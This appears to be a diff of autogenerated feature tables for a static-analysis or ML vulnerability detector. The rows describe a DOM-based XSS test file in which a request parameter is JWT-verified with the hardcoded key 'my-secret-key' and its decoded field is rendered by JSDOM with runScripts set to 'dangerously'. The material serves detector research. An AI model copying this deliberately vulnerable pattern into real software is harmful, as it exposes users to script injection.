autogenerated/Xss/DomBasedXss/jwt-server.js:6:33:6:35 | req | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:33:6:35 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:33:6:35 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:33:6:35 | req | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:33:6:35 | req | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:33:6:35 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:33:6:35 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:33:6:35 | req | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:33:6:35 | req | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:38:6:40 | res | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:38:6:40 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:38:6:40 | res | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:38:6:40 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:38:6:40 | res | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:9:7:13 | taint | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:9:7:13 | taint | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:9:7:13 | taint | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:9:7:13 | taint | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:9:7:13 | taint | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:9:7:35 | taint | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:9:7:35 | taint | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:9:7:35 | taint | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:9:7:35 | taint | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:9:7:35 | taint | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:9:7:35 | taint = ... obble") | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:9:7:35 | taint = ... obble") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:9:7:35 | taint = ... obble") | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:9:7:35 | taint = ... obble") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:9:7:35 | taint = ... obble") | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:17:7:19 | req | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:17:7:19 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:17:7:19 | req | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:17:7:19 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:17:7:19 | req | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:17:7:25 | req.param | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:17:7:25 | req.param | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:17:7:25 | req.param | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:17:7:25 | req.param | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:17:7:25 | req.param | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:17:7:35 | exceptional return of req.param("wobble") | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:17:7:35 | exceptional return of req.param("wobble") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:17:7:35 | exceptional return of req.param("wobble") | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:17:7:35 | exceptional return of req.param("wobble") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:17:7:35 | exceptional return of req.param("wobble") | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:17:7:35 | req.param("wobble") | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:17:7:35 | req.param("wobble") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:17:7:35 | req.param("wobble") | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:17:7:35 | req.param("wobble") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:17:7:35 | req.param("wobble") | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:21:7:25 | param | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:21:7:25 | param | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:21:7:25 | param | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:21:7:25 | param | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:7:21:7:25 | param | fileImports | express jsdom jsonwebtoken | | autogenerated/Xss/DomBasedXss/jwt-server.js:7:27:7:34 | "wobble" | CalleeFlexibleAccessPath | req.param | | autogenerated/Xss/DomBasedXss/jwt-server.js:7:27:7:34 | "wobble" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jwt-server.js:7:27:7:34 | "wobble" | contextFunctionInterfaces | | @@ -14175,6 +103536,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jwt-server.js:7:27:7:34 | "wobble" | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/DomBasedXss/jwt-server.js:7:27:7:34 | "wobble" | fileImports | express jsdom jsonwebtoken | | autogenerated/Xss/DomBasedXss/jwt-server.js:7:27:7:34 | "wobble" | receiverName | req | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:5:9:7 | jwt | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:5:9:7 | jwt | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:5:9:7 | jwt | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:5:9:7 | jwt | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:5:9:7 | jwt | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:5:9:14 | jwt.verify | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:5:9:14 | jwt.verify | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:5:9:14 | jwt.verify | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:5:9:14 | jwt.verify | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:5:9:14 | jwt.verify | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:5:12:6 | exceptional return of jwt.ver ... \\n }) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:5:12:6 | exceptional return of jwt.ver ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:5:12:6 | exceptional return of jwt.ver ... \\n }) | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:5:12:6 | exceptional return of jwt.ver ... \\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:5:12:6 | exceptional return of jwt.ver ... \\n }) | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:5:12:6 | jwt.ver ... \\n }) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:5:12:6 | jwt.ver ... \\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:5:12:6 | jwt.ver ... \\n }) | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:5:12:6 | jwt.ver ... \\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:5:12:6 | jwt.ver ... \\n }) | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:9:9:14 | verify | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:9:9:14 | verify | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:9:9:14 | verify | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:9:9:14 | verify | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:9:9:14 | verify | fileImports | express jsdom jsonwebtoken | | autogenerated/Xss/DomBasedXss/jwt-server.js:9:16:9:20 | taint | CalleeFlexibleAccessPath | jwt.verify | | autogenerated/Xss/DomBasedXss/jwt-server.js:9:16:9:20 | taint | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jwt-server.js:9:16:9:20 | taint | calleeImports | jsonwebtoken | @@ -14193,6 +103579,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jwt-server.js:9:23:9:37 | 'my-secret-key' | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/DomBasedXss/jwt-server.js:9:23:9:37 | 'my-secret-key' | fileImports | express jsdom jsonwebtoken | | autogenerated/Xss/DomBasedXss/jwt-server.js:9:23:9:37 | 'my-secret-key' | receiverName | jwt | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:9:39 | JSDOM | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:9:39 | JSDOM | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:9:39 | JSDOM | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:9:39 | JSDOM | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:9:39 | JSDOM | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:9:39 | this | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:9:39 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:9:39 | this | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:9:39 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:9:39 | this | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:12:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:12:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:12:5 | 'arguments' object of anonymous function | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:12:5 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:12:5 | 'arguments' object of anonymous function | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:12:5 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:12:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:12:5 | exceptional return of anonymous function | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:12:5 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:12:5 | exceptional return of anonymous function | fileImports | express jsdom jsonwebtoken | | autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:12:5 | functio ... ;\\n } | CalleeFlexibleAccessPath | jwt.verify | | autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:12:5 | functio ... ;\\n } | InputArgumentIndex | 2 | | autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:12:5 | functio ... ;\\n } | calleeImports | jsonwebtoken | @@ -14202,6 +103608,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:12:5 | functio ... ;\\n } | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:12:5 | functio ... ;\\n } | fileImports | express jsdom jsonwebtoken | | autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:12:5 | functio ... ;\\n } | receiverName | jwt | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:12:5 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:12:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:12:5 | return of anonymous function | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:12:5 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:40:12:5 | return of anonymous function | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:50:9:52 | err | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:50:9:52 | err | contextSurroundingFunctionParameters | (req, res)\n(err, decoded) | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:50:9:52 | err | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:50:9:52 | err | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:50:9:52 | err | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:55:9:61 | decoded | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:55:9:61 | decoded | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:55:9:61 | decoded | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:55:9:61 | decoded | contextSurroundingFunctionParameters | (req, res)\n(err, decoded) | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:55:9:61 | decoded | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:55:9:61 | decoded | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:55:9:61 | decoded | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:55:9:61 | decoded | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:55:9:61 | decoded | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:9:55:9:61 | decoded | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:9:11:61 | exceptional return of new JSD ... sly" }) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:9:11:61 | exceptional return of new JSD ... sly" }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:9:11:61 | exceptional return of new JSD ... sly" }) | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:9:11:61 | exceptional return of new JSD ... sly" }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:9:11:61 | exceptional return of new JSD ... sly" }) | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:9:11:61 | new JSD ... sly" }) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:9:11:61 | new JSD ... sly" }) | contextSurroundingFunctionParameters | (req, res)\n(err, decoded) | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:9:11:61 | new JSD ... sly" }) | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:9:11:61 | new JSD ... sly" }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:9:11:61 | new JSD ... sly" }) | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:13:11:17 | JSDOM | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:13:11:17 | JSDOM | contextSurroundingFunctionParameters | (req, res)\n(err, decoded) | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:13:11:17 | JSDOM | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:13:11:17 | JSDOM | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:13:11:17 | JSDOM | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:19:11:25 | decoded | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:19:11:25 | decoded | contextSurroundingFunctionParameters | (req, res)\n(err, decoded) | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:19:11:25 | decoded | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:19:11:25 | decoded | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:19:11:25 | decoded | fileImports | express jsdom jsonwebtoken | | autogenerated/Xss/DomBasedXss/jwt-server.js:11:19:11:29 | decoded.foo | CalleeFlexibleAccessPath | JSDOM | | autogenerated/Xss/DomBasedXss/jwt-server.js:11:19:11:29 | decoded.foo | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jwt-server.js:11:19:11:29 | decoded.foo | calleeImports | jsdom | @@ -14210,6 +103656,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jwt-server.js:11:19:11:29 | decoded.foo | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | | autogenerated/Xss/DomBasedXss/jwt-server.js:11:19:11:29 | decoded.foo | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/DomBasedXss/jwt-server.js:11:19:11:29 | decoded.foo | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:27:11:29 | foo | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:27:11:29 | foo | contextSurroundingFunctionParameters | (req, res)\n(err, decoded) | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:27:11:29 | foo | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:27:11:29 | foo | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:27:11:29 | foo | fileImports | express jsdom jsonwebtoken | | autogenerated/Xss/DomBasedXss/jwt-server.js:11:32:11:60 | { runSc ... usly" } | CalleeFlexibleAccessPath | JSDOM | | autogenerated/Xss/DomBasedXss/jwt-server.js:11:32:11:60 | { runSc ... usly" } | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/jwt-server.js:11:32:11:60 | { runSc ... usly" } | calleeImports | jsdom | @@ -14218,6 +103669,93 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jwt-server.js:11:32:11:60 | { runSc ... usly" } | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | | autogenerated/Xss/DomBasedXss/jwt-server.js:11:32:11:60 | { runSc ... usly" } | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/DomBasedXss/jwt-server.js:11:32:11:60 | { runSc ... usly" } | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:34:11:43 | runScripts | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:34:11:43 | runScripts | contextSurroundingFunctionParameters | (req, res)\n(err, decoded) | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:34:11:43 | runScripts | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:34:11:43 | runScripts | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:34:11:43 | runScripts | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:34:11:58 | runScri ... rously" | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:34:11:58 | runScri ... rously" | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:34:11:58 | runScri ... rously" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:34:11:58 | runScri ... rously" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:34:11:58 | runScri ... rously" | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:34:11:58 | runScri ... rously" | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:34:11:58 | runScri ... rously" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:34:11:58 | runScri ... rously" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:34:11:58 | runScri ... rously" | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:34:11:58 | runScri ... rously" | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:46:11:58 | "dangerously" | CalleeFlexibleAccessPath | JSDOM | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:46:11:58 | "dangerously" | InputAccessPathFromCallee | ?.runScripts | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:46:11:58 | "dangerously" | InputArgumentIndex | 1 | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:46:11:58 | "dangerously" | assignedToPropName | runScripts | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:46:11:58 | "dangerously" | calleeImports | jsdom | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:46:11:58 | "dangerously" | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:46:11:58 | "dangerously" | contextSurroundingFunctionParameters | (req, res)\n(err, decoded) | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:46:11:58 | "dangerously" | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:46:11:58 | "dangerously" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:11:46:11:58 | "dangerously" | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:1:1:1:0 | this | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:1:1:1:1 | $ | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:1:1:1:1 | $ | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:1:1:1:1 | $ | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:1:1:1:1 | jwt_decode | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:1:1:1:1 | jwt_decode | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:1:1:1:1 | jwt_decode | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:1:1:1:36 | import ... ecode"; | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:1:1:1:36 | import ... ecode"; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:1:1:1:36 | import ... ecode"; | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:1:8:1:17 | jwt_decode | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:1:8:1:17 | jwt_decode | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:1:8:1:17 | jwt_decode | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:1:8:1:17 | jwt_decode | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:1:8:1:17 | jwt_decode | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:1:8:1:17 | jwt_decode | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:1:8:1:17 | jwt_decode | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:1:8:1:17 | jwt_decode | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:1:8:1:17 | jwt_decode | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:1:8:1:17 | jwt_decode | fileImports | jquery jwt-decode | 